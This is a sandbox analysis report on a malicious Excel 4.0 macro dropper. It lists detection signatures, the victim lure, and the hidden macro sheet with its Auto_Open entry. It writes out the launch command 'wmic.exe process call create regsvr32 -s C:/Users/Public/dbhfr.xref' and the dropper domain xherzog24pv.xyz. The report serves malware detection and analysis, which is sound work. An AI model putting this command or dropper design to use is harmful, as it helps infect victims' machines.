Play interactive tour

Edit tour

Analysis Report Documents (252).xlsm

Overview

General Information

Sample Name:	Documents (252).xlsm
Analysis ID:	382991
MD5:	966c13f10fa0b3bfe75da87bca817396
SHA1:	1769db2ec1d019b526e63637a413ceab10d00ff3
SHA256:	963963dd218deb7e041b5a2ccf85a48c12d62bd2bdc248d6636b332f234cba14
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Wmic Launch regsvr32

Contains functionality to create processes via WMI

Creates processes via WMI

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Office document connecting to suspicious TLD

Outdated Microsoft Office dropper detected

Performs DNS queries to domains with low reputation

Potential document exploit detected (performs DNS queries with low reputation score)

Excel documents contains an embedded macro which executes code when the document is opened

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2268 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

WMIC.exe (PID: 2512 cmdline: wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref' MD5: FD902835DEAEF4091799287736F3A028)

regsvr32.exe (PID: 2928 cmdline: regsvr32 -s C:/Users/Public/dbhfr.xref MD5: 59BCE9F07985F8A4204F4D6554CFF708)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Wmic Launch regsvr32

Show sources

Source: Process started

Author: Joe Security: Data: Command: wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref', CommandLine: wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref', CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2268, ProcessCommandLine: wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref', ProcessId: 2512

Signature Overview

Click to jump to signature section

Show All Signature Results

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\wbem\WMIC.exe

Potential document exploit detected (performs DNS queries with low reputation score)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

DNS query: name: xherzog24pv.xyz

Source: global traffic

DNS query: name: xherzog24pv.xyz

Networking:

Office document connecting to suspicious TLD

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

DNS traffic detected: xherzog24pv.xyz

Outdated Microsoft Office dropper detected

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

DNS query: xherzog24pv.xyz is down

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

DNS query: xherzog24pv.xyz

Source: unknown

DNS traffic detected: query: xherzog24pv.xyz replaycode: Name error (3)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F763B4BE.png

Jump to behavior

Source: unknown

DNS traffic detected: queries for: xherzog24pv.xyz

Source: WMIC.exe, 00000003.00000002.2083197234.0000000001BD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2083045967.0000000001CC0000.00000002.00000001.sdmp

String found in binary or memory: http://servername/isapibackend.dll

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing" 11 from the yellow bar above 12 13 @ Once You have Enable Editing, please click "
Source: Screenshot number: 4	Screenshot OCR: Enable Content" 14 from the yellow bar above 15 16 17 18 WHY I CANNOT OPEN THIS DOCUMENT? 19
Source: Screenshot number: 8	Screenshot OCR: Enable Editing" 11 from the yellow bar above 12 13 @ Once You have Enable Editing, please click "
Source: Screenshot number: 8	Screenshot OCR: Enable Content X R12 - "- jR V \ A B C D E F G H I J K L M N O P Q R S : 1 2 ' Ga,, THIS DO
Source: Screenshot number: 12	Screenshot OCR: Enable Editing" from the yellow bar above @ Once You have Enable Editing, please click "Enable Con
Source: Screenshot number: 12	Screenshot OCR: Enable Content Al " " Clickfor more details A B C D E F G H I J K L M N O P Q R S 1 2 3 4 5
Source: Screenshot number: 16	Screenshot OCR: enable content only if you trust the contents of the file. Trust Center Settings Learn more about
Source: Screenshot number: 16	Screenshot OCR: Enable Macros Content " You should enable content only if you trust the contents of the file. Tru

Contains functionality to create processes via WMI

Show sources

Source: WMIC.exe, 00000003.00000002.2083116468.00000000001E0000.00000004.00000020.sdmp

Binary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref'C:\Windows\System32\Wbem\wmic.exeWinSta0\Default

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: Documents (252).xlsm

Initial sample: EXEC

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: Documents (252).xlsm

Initial sample: Sheet size: 88698

Source: workbook.xml

Binary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="23127"/><workbookPr defaultThemeVersion="124226"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Janadark\3D Objects\corp\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="8_{29DC8E7E-AE72-4A96-8469-EA40E9BC458E}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15840" firstSheet="1" activeTab="1" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="dbapi "=sd" sheetId="4" state="hidden" r:id="rId1"/><sheet name="FrameSecure" sheetId="5" r:id="rId2"/></sheets><definedNames><definedName name="dontdoit" function="1" xlm="1">-676986879</definedName><definedName name="okwell" function="1" xlm="1">124715010</definedName><definedName name="plzno" function="1" xlm="1">-709623808</definedName><definedName name="_xlnm.Auto_Open">'dbapi "=sd'!$AA$6</definedName></definedNames><calcPr calcId="144525"/></workbook>

Source: classification engine

Classification label: mal96.troj.expl.evad.winXLSM@4/12@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Documents (252).xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRBBEE.tmp

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref'
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:/Users/Public/dbhfr.xref
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe process call create 'regsvr32 -s C:/Users/Public/dbhfr.xref'

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Documents (252).xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: Documents (252).xlsm	Initial sample: OLE zip file path = xl/media/image2.png
Source: Documents (252).xlsm	Initial sample: OLE zip file path = xl/media/image3.png

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\wbem\WMIC.exe TID: 2796

Thread sleep time: -180000s >= -30000s

Source: C:\Windows\System32\wbem\WMIC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation21	Path Interception	Process Injection1	Masquerading1	OS Credential Dumping	Virtualization/Sandbox Evasion1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Non-Application Layer Protocol1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting21	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	File and Directory Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution31	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion1	Security Account Manager	System Information Discovery4	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection1	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Scripting21	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
xherzog24pv.xyz	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
xherzog24pv.xyz	unknown	unknown	true	1%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://servername/isapibackend.dll	WMIC.exe, 00000003.00000002.2083197234.0000000001BD0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2083045967.0000000001CC0000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
192.168.2.255

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	382991
Start date:	07.04.2021
Start time:	02:09:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 4m 37s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Documents (252).xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.expl.evad.winXLSM@4/12@1/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe

Simulations

Behavior and APIs

Time	Type	Description
02:09:38	API Interceptor	9x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\842F6688.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	7.761039651897249
Encrypted:	false
SSDEEP:	24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA
MD5:	600F503BC1066BEB5FB5DD494AA1CD74
SHA1:	A504D5E687B98F9E0FD2896DFC8492DE0F974BE6
SHA-256:	B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
SHA-512:	B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x....IDATHK..YL.Q......Vl.P. .qC.(....(.".-..q....%1.q./F.Q.L\./4.KlX.Q...EE..(. ..V.i;.z...h..7.0........(...\|s.k.J.Mm].J\|.3........W.&EE..s.hS.}.....%^x`s....s..Rb..9....jw...o.e..17=:!&..X.Q._.!. \|....N$.L.1.N..}.k..v..2.piZ..A.,.l.w......I.{...p...C[......'.........b....:f.\?!3MK........Cb..B.....%`?1..Y>9\....P.......z..uK...g.V.P.U.3...L.j.?(.g.....}.=.}......L.B.{...i.!..-q....9(=%^......&.q.j..>.q...w.NO.@.D..jmnL...U.R0B=6...U....P}Koh.D@"...]9...r,. .."2.......[.~ .......... .ay....nCm'...(..$......_4....*gNT..02h...zT.b.hhF..E.l.Z..J8.....=..H.{....Q...hg.g...u_!...T7./..+...u.....m...C]..E-..ki.CS..2.V..v>.?..$d..U.o.o...w........."....7..g...O]...U`..........g..A.j.....b...\.s(I.......@._B....i..2.I..7W.6....`..!r].P.......^.8n ..X...+3...F.....!x...H..fkYu....y.l...(../.y....,;~qV.R!#C.q...yoE..{O:...R.......c...Z;..[.x.....#N...'....M..@...n0..nD..!..p.!J....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C8A64E9.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 287 x 78, 8-bit/color RGBA, non-interlaced
Category:	modified
Size (bytes):	15644
Entropy (8bit):	7.974497191204788
Encrypted:	false
SSDEEP:	384:EZRPEsXoz+jRHBbn1+3rhK0XwN8KHpy/c2C9NZ9ff:EZ6sYijj43VK0XwmKJ39Nnf
MD5:	29A9EE6FB5591751FC60ECD0FDB9478D
SHA1:	D8A58D27A5D77416E1B882FDE001FE827EB0C1F5
SHA-256:	F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F
SHA-512:	5465ABC4330E88D0490B5F61532B990859600F920D4ACA8F4A9013344B478EF51823D37E850ECF67829EEDFB80C00B6324EFE97DD175E56985C1AC07ED890AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.......N.............sRGB.........gAMA......a.....pHYs..........&.?..<.IDATx^.wxTU...........M..+....G..J.^.P.T...6:.$$....H..J.......u.a2LB(F.g]n.....Y..W...+..r..U.o.$'/...o./.E..R.r.y..D.G.P..R.@A.....b...O?..n....0Pbc.d..)Gu.^..\|\.'..K.c..IJJ...`.......4o...]GV.$/...<..S.<.<RD..s...../^B...._.U.J.F..{..2\|.p..S.N....[\.q.o.......e.....$.}..4k.L^...y.R./_~.=....H.......\c;.. .a.9sI..9..2e^.V.ZK@@.......2.W..q..L.?..CN.>-.7o...H...o....B.)R......^.......<A.{;...k..o....7..\M..+.....J...ge.U2v.X...T.PA.z...-ZL...&O...ooP.~...-l.c3..}..7.m.....w..>...r..IY.h....o..{m.^....[."..2..\.....)[.....v.zJ.\|LJ.zB.x.)3.T..g3...K..T......c.c...k2j.(...7..>..e.b/_.BF.....i....y...6\|f}4......+[..T.\Y..+-[..n..o...o..VM./..+={~,.;v..M.J...b...K.5.......x,.q.f..e...+)3v%3...W....k...N.........:.-3.l.}...D.*T.(W...o..&S.D....d....g..9r..?~\N.8............r.J.5k.9w...4X......=..sz.{~@...&.c.Rf.Jf..>..U..bbb.>2....9......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ABD84DE3.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	677
Entropy (8bit):	7.433026174405032
Encrypted:	false
SSDEEP:	12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6
MD5:	55E8A29B221E51BE421B7D4F5F5F7E52
SHA1:	117E73181FC9CDAA0904C6372D68EE48CEDC14E4
SHA-256:	B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
SHA-512:	8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x...JIDATHKc...?...g..l.;k...FF...@H..jb`d..?-P'.SYA......f.........'.?............{K.a..:..W..s.~.....{.....<.....9.......[.=\{.._FN^._{'{3VM?.p..v._....v..;..s...O......\|........yaz....!/...........o..xZ.Sn...O+YP.122.....33.A..3.?.DR...+.F...o.M_..h.W...}..K?.............z..K...........F?..{............\|..`!lX...E.....$.......3... ..0....+.r.D.D7e.&.b...t...../..o.I2.p...yl.J\|.Y0j4Z....!.s#;.XW.gbd`.bb........X..ue...'fi..[1..!.@.......s.:(..e`}.. ...-...1.. J..(`..,}.X...H.>".m?..h .X.D.5Ff......y"4.P.4d...@.A..8.[?..7q....I..M..[.>\{....j..Y3...3.5'......op.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C16FFF7C.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 287 x 78, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	15644
Entropy (8bit):	7.974497191204788
Encrypted:	false
SSDEEP:	384:EZRPEsXoz+jRHBbn1+3rhK0XwN8KHpy/c2C9NZ9ff:EZ6sYijj43VK0XwmKJ39Nnf
MD5:	29A9EE6FB5591751FC60ECD0FDB9478D
SHA1:	D8A58D27A5D77416E1B882FDE001FE827EB0C1F5
SHA-256:	F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F
SHA-512:	5465ABC4330E88D0490B5F61532B990859600F920D4ACA8F4A9013344B478EF51823D37E850ECF67829EEDFB80C00B6324EFE97DD175E56985C1AC07ED890AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR.......N.............sRGB.........gAMA......a.....pHYs..........&.?..<.IDATx^.wxTU...........M..+....G..J.^.P.T...6:.$$....H..J.......u.a2LB(F.g]n.....Y..W...+..r..U.o.$'/...o./.E..R.r.y..D.G.P..R.@A.....b...O?..n....0Pbc.d..)Gu.^..\|\.'..K.c..IJJ...`.......4o...]GV.$/...<..S.<.<RD..s...../^B...._.U.J.F..{..2\|.p..S.N....[\.q.o.......e.....$.}..4k.L^...y.R./_~.=....H.......\c;.. .a.9sI..9..2e^.V.ZK@@.......2.W..q..L.?..CN.>-.7o...H...o....B.)R......^.......<A.{;...k..o....7..\M..+.....J...ge.U2v.X...T.PA.z...-ZL...&O...ooP.~...-l.c3..}..7.m.....w..>...r..IY.h....o..{m.^....[."..2..\.....)[.....v.zJ.\|LJ.zB.x.)3.T..g3...K..T......c.c...k2j.(...7..>..e.b/_.BF.....i....y...6\|f}4......+[..T.\Y..+-[..n..o...o..VM./..+={~,.;v..M.J...b...K.5.......x,.q.f..e...+)3v%3...W....k...N.........:.-3.l.}...D.*T.(W...o..&S.D....d....g..9r..?~\N.8............r.J.5k.9w...4X......=..sz.{~@...&.c.Rf.Jf..>..U..bbb.>2....9......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F0A1E1A7.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	7.761039651897249
Encrypted:	false
SSDEEP:	24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA
MD5:	600F503BC1066BEB5FB5DD494AA1CD74
SHA1:	A504D5E687B98F9E0FD2896DFC8492DE0F974BE6
SHA-256:	B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
SHA-512:	B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x....IDATHK..YL.Q......Vl.P. .qC.(....(.".-..q....%1.q./F.Q.L\./4.KlX.Q...EE..(. ..V.i;.z...h..7.0........(...\|s.k.J.Mm].J\|.3........W.&EE..s.hS.}.....%^x`s....s..Rb..9....jw...o.e..17=:!&..X.Q._.!. \|....N$.L.1.N..}.k..v..2.piZ..A.,.l.w......I.{...p...C[......'.........b....:f.\?!3MK........Cb..B.....%`?1..Y>9\....P.......z..uK...g.V.P.U.3...L.j.?(.g.....}.=.}......L.B.{...i.!..-q....9(=%^......&.q.j..>.q...w.NO.@.D..jmnL...U.R0B=6...U....P}Koh.D@"...]9...r,. .."2.......[.~ .......... .ay....nCm'...(..$......_4....*gNT..02h...zT.b.hhF..E.l.Z..J8.....=..H.{....Q...hg.g...u_!...T7./..+...u.....m...C]..E-..ki.CS..2.V..v>.?..$d..U.o.o...w........."....7..g...O]...U`..........g..A.j.....b...\.s(I.......@._B....i..2.I..7W.6....`..!r].P.......^.8n ..X...+3...F.....!x...H..fkYu....y.l...(../.y....,;~qV.R!#C.q...yoE..{O:...R.......c...Z;..[.x.....#N...'....M..@...n0..nD..!..p.!J....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F763B4BE.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	677
Entropy (8bit):	7.433026174405032
Encrypted:	false
SSDEEP:	12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6
